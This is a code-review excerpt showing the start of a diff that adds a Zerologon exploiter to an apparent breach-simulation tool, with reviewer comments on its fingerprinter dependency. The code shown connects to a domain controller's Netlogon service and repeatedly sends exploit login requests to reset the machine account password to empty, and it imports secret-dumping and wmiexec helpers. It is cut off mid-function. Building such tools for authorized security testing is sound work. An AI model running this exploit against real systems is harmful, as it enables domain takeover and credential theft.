monkey/infection_monkey/exploit/zerologon.py

```diff
@@ -0,0 +1,433 @@
+"""
+
+import logging
+import os
+import re
+from binascii import unhexlify
+from typing import Dict, List, Optional
+
+import impacket
+from impacket.dcerpc.v5 import nrpc
+from impacket.dcerpc.v5.dtypes import NULL
+
+from common.utils.exploit_enum import ExploitType
+from infection_monkey.exploit.HostExploiter import HostExploiter
+from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
+from infection_monkey.exploit.zerologon_utils.options import \
+    OptionsForSecretsdump
+from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec
+from infection_monkey.network.zerologon_fingerprint import ZerologonFinger
+from infection_monkey.utils.capture_output import StdoutCapture
+
+LOG = logging.getLogger(__name__)
+
+
+class ZerologonExploiter(HostExploiter):
+    _TARGET_OS_TYPE = ['windows']
+    _EXPLOITED_SERVICE = 'Netlogon'
+    EXPLOIT_TYPE = ExploitType.VULNERABILITY
+    RUNS_AGENT_ON_SUCCESS = False
+    MAX_ATTEMPTS = 2000
+    ERROR_CODE_ACCESS_DENIED = 0xc0000022
+
+    def __init__(self, host: object):
+        super().__init__(host)
+        self.vulnerable_port = None
+        self.zerologon_finger = ZerologonFinger()
+        self.exploit_info['credentials'] = {}
+
+    def _exploit_host(self) -> bool:
+        self.dc_ip, self.dc_name, self.dc_handle = self.zerologon_finger._get_dc_details(self.host)
+
+        if self.is_exploitable():
+            LOG.info("Target vulnerable, changing account password to empty string.")
+
+            # Connect to the DC's Netlogon service.
+            try:
+                rpc_con = self.zerologon_finger.connect_to_dc(self.dc_ip)
+            except Exception as e:
+                LOG.info(f"Exception occurred while connecting to DC: {str(e)}")
+                return False
+
+            # Start exploiting attempts.
+            LOG.debug("Attempting exploit.")
+            _exploited = self._send_exploit_rpc_login_requests(rpc_con)
+
+            rpc_con.disconnect()
+
+        else:
+            LOG.info("Exploit not attempted. "
+                     "Target is most likely patched, or an error was encountered by the Zerologon fingerprinter.")
+            return False
+
+        # Restore DC's original password.
+        if _exploited:
+            if self.restore_password():
+                LOG.info("System exploited and password restored successfully.")
+            else:
+                LOG.info("System exploited but couldn't restore password!")
+        else:
+            LOG.info("System was not exploited.")
+
+        return _exploited
+
+    def is_exploitable(self) -> bool:
+        if self.zerologon_finger._SCANNED_SERVICE in self.host.services:
+            return self.host.services[self.zerologon_finger._SCANNED_SERVICE]['is_vulnerable']
+        else:
+            is_vulnerable = self.zerologon_finger.attempt_authentication(dc_handle=self.dc_handle,
```

Comment:
This case happens only if zerologon fingerprinter is disabled, but we call it anyway. Why don't we raise exception "ZeroLogon exploiter requires zero logon fingerprinter to be enabled"?

Reply:
Also, we should note that first thing in the description of the exploiter

Reply:
Removing the fingerprinter as per yesterday's discussion.